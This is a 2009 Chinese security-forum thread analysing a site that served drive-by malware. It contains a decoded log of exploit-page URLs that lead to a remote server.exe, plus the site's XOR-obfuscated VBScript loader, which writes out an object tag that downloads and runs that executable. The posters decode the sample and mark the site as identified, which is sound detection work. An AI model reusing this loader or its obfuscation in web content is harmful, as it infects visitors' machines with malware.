http://p.99081.com(挂马)

显示全部楼层 · 发表于 2009-6-30 16:56:49

关于:解密的日志(全体输出 -  39):
Level  1>http://p.99081.com/ystat/h1/activxx.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/ajax.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/cx.htm
Level  1>http://p.99081.com/ystat/h1/jetaudio.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/jkx.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/lz1.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/lz2.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/mcafee.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/ms06014.htm
Level  1>http://p.99081.com/ystat/h1/ms07004.htm
Level  1>http://p.99081.com/ystat/h1/ms08053.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/office.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/opera.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/rl11.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/ruising.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/td.htm
Level  1>http://p.99081.com/ystat/h1/thunder.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/ttplayer.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/woeks.htm
Level  1>http://p.99081.com/ystat/h1/xla.htm
Level  2>http://www.wl22.com/group/images/server.exe#version=1,0,0,1
Level  1>http://p.99081.com/ystat/h1/yahoo1.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
Level  1>http://p.99081.com/ystat/h1/yht.htm
Level  2>http://www.wl22.com/group/images/server.exe  ●
日志由 Redoce1.9第68次修正版于 2009-6-30 16:55:45 生成。

显示全部楼层 · 发表于 2009-6-30 16:58:37

http://www.wl22.com/group/images/server.exe
貌似已经失效

显示全部楼层 · 发表于 2009-6-30 16:59:19

红伞微点没反应~~

显示全部楼层 · 发表于 2009-6-30 17:04:21

NOD32 网盾微点米有反应

显示全部楼层 · 发表于 2009-6-30 17:05:53

这个地址是已经失效，不过这些地址的加密算是一种类型。

显示全部楼层 · 发表于 2009-6-30 19:05:04

这是不是上次没接出来的那个类型么，怎么结出来的？

<script language=vbscript>
Function NC(x)
For i=1 to Len(x) Step 2
NC=NC & Chr(CLng("&H" & Mid(x,i,2)) Xor 26)
Next
End Function
x="267578707F796E3A79767B6969737E2738797669737E202D5F2A595E5F5F2D375E59222A372E5C292D37232E2B2A372D232A58582F5F23282D2A5F383A79757E7F787B697F2738726E6E6A2035356D6D6D346D76282834797577357D68756F6A3573777B7D7F6935497F686C7F68347F627F396C7F6869737574272B362A362A362B383A6D737E6E722738222A2A383A727F737D726E27382B232B382426357578707F796E241710"
document.write NC(x)
</script>

显示全部楼层 · 发表于 2009-6-30 19:48:51

document.write改成alert后运行.有时会弹出代码不全.

显示全部楼层 · 发表于 2009-6-30 19:50:21

因为alert函数弹出的长度有限制

显示全部楼层 · 发表于 2009-6-30 20:14:25

ie能谈火狐压根就不显示我说刚才怎么改了也不显示呢

[已鉴定] http://p.99081.com(挂马)

回复 2楼 taoyuan237 的帖子

回复 6楼 xiaoqiang305 的帖子

回复 7楼 knifed 的帖子